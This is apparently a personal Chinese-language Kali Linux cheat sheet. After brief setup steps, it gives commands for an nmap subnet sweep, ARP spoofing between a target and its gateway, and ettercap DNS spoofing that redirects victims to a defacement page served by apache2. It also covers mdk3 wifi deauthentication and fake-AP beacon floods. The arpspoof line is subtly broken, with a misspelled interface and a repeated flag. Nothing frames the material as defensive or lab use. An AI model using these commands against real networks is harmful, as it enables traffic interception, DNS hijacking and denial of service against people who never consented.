ssh:/etc/init.d/ssh start #start ssh then logout 开启SSH
leafpad /etc/apt/source.list //修改kali 更新源
apt-get update //更新
apt-get dist-upgrade //安装更新
apt-get install fcitx fcitx-googlepinyin //安装中文输入法
nmap -sP 192.168.0.0/24 //查找网段类存活主机
echo 1 >/proc/sys/net/ipv4/ip_forward
arpspoof -i etho -i 192.168.1.100 192.168.1.1 //第一个IP是目标IP 第二个是网关IP
修改ettercap DNS文件。
文件目录:/etc/ettercap/etter.dns
用记事本打开它。
ctrl+f 搜索
关键字:# redirect it to http://www.linux.org
在终端输入/etc/init.d/apache2 start
来启动apache2 也就是网页服务器
apache2的根目录是/var/www 修改一下index.html 改成黑页
在终端输入ettercap -G来进入ettercap的图形界面
//无线wifi相关
airmon-ng start wlan0
airodump-ng mon0 //获取wifi
//无线攻击 mdk3
mdk3 mon0 d
-w <filename> #白名单mac地址列表文件
-b <filename> #黑名单mac地址列表文件
-s <pps> #速率,这个模式下默认无限制
-c [chan,chan,chan,…] #信道,可以多填,如 2,4,5,1
方法三:伪造AP
产生大量死亡SSID来充斥无线客户端的无线列表,扰乱用户;还可以自定义发送死亡SSID的BSSID和ESSID、加密方式(如wep/wpa2)等。感觉鸡肋
mdk3 mon0 b
-n <ssid> #自定义ESSID
-f <filename> #读取ESSID列表文件
-v <filename> #自定义ESSID和BSSID对应列表文件
-d #自定义为Ad-Hoc模式
-w #自定义为wep模式
-g #54Mbit模式
-t # WPA TKIP encryption
-a #WPA AES encryption
-m #读取数据库的mac地址
-c <chan> #自定义信道
-s <pps> #发包速率
mdk3 –help b #查看详细内容